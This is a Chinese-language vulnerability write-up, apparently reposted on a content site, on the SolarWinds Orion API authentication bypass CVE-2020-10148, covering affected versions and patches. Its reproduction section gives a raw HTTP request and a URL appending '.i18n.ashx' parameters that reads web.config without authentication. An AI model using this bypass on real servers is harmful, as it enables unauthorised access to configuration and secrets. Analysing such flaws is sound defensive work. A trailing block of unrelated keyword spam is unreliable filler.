千家信息网

SolarWinds Orion API 远程代码执行漏洞CVE-2020-10148的分析是什么样的

发表于:2025-12-01 作者:千家信息网编辑
千家信息网最后更新 2025年12月01日,这篇文章给大家介绍SolarWinds Orion API 远程代码执行漏洞CVE-2020-10148的分析是什么样的,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。SolarW
千家信息网最后更新 2025年12月01日SolarWinds Orion API 远程代码执行漏洞CVE-2020-10148的分析是什么样的

这篇文章给大家介绍SolarWinds Orion API 远程代码执行漏洞CVE-2020-10148的分析是什么样的,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。

SolarWinds Orion API 远程代码执行漏洞

(CVE-2020-10148)

一、漏洞概况

SolarWinds Orion API 嵌入在 Orion Core 中,被用于与所有 SolarWinds Orion Platform 产品进行接口。通过在URI请求的Request.PathInfo 部分中包含特定参数,可以绕过 API 身份验证,这可能允许攻击者执行未经身份验证的 API 命令。如果攻击者将WebResource.adx,scriptResource.adx,i18n.ashx 或 Skipi18n 的 PathInfo 参数附加到对 SolarWinds Orion 服务器的请求,SolarWinds 可能会设置 SkipAuthorization 标志,该标志可能允许处理API请求无需身份验证。

攻击者可利用该漏洞远程执行任意代码,有专业黑客组织利用该漏洞投递代号为'SUPERNOVA'的恶意程序。

二、漏洞影响范围

影响版本:

SolarWinds Orion 2020.2.1 HF 2 及 2019.4 HF 6之前的版本

安全版本:

SolarWinds Orion 2019.4 HF 6(2020年12月14日发布)

SolarWinds Orion 2020.2.1 HF 2(发布于2020年12月15日)

SolarWinds Orion 2019.2 SUPERNOVA补丁(2020年12月23日发布)

SolarWinds Orion 2018.4 SUPERNOVA补丁(2020年12月23日发布)

SolarWinds Orion 2018.2 SUPERNOVA补丁(2020年12月23日发布)

三、漏洞复现

访问/Orion/invalid.aspx.js 路径,截取请求头中Location中data获取

Location:/Orion/invalid.aspx.js.i18n.ashx?l=en-us&v=43005.14.L

GET/Orion/invalid.aspx.jsHTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0Accept: text/css,*/*;q=0.1Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeReferer: http://127.0.0.1/Orion/Login.aspx?ReturnUrl=%2fCookie: ASP.NET_SessionId=p5yxzzumyllsfprttbkexo4u; TestCookieSupport=Supported; Orion_IsSessionExp=TRUE

response

HTTP/1.1404Not FoundCache-Control: no-cachePragma: no-cacheExpires: -1Location: /Orion/invalid.aspx.js.i18n.ashx?l=en-us&v=43005.14.LServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Same-Domain: 1X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockDate: Wed, 30 Dec 2020 01:55:43 GMTConnection: closeContent-Length: 0

将 .i18n.ashx?l=en-US&v=43005.14.L携带到下个访问路径,从而绕过身份认证。这里访问的是 web.config文件。

直接访问也行:

http://127.0.0.1/web.config.i18n.ashx?l=en-us&v=43005.14.L

关于SolarWinds Orion API 远程代码执行漏洞CVE-2020-10148的分析是什么样的就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。

漏洞 代码 日发布 身份 攻击者 版本 补丁 攻击 验证 分析 内容 参数 更多 标志 路径 帮助 影响 不错 安全 专业 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 网络安全应急预案的概念 计算机网络技术安全的实际情况 服务器都有哪些操作系统 多媒体数据库基本功能 数据库技术导论期末总结 安卓软件开发一般用什么 北京优合信网络技术有限公司 新乡鸿业软件开发有限公司招聘 互联网高科技公司起名 服务器关闭的游戏还能再上架吗 第九届首都网络安全日观后感 武汉学习网络安全的地方 安全加固服务器 国家医保平台服务器开小差 显卡坏了网络安全模式能玩么 mfc 读取注册表数据库 cmmi3软件开发流程图 酒店网络安全上报流程图 材料学数据库 华三杯网络技术大赛题 东土边缘服务器应用 网络安全日是哪年设定的 githubpage数据库 山东省最年轻的网络安全工程师 微信重装回复数据库 服务器关闭的游戏还能再上架吗 服务器和硬盘一起装系统 国际空间站网络安全 数据库营销的四个实施过程 考个计算机网络安全证
0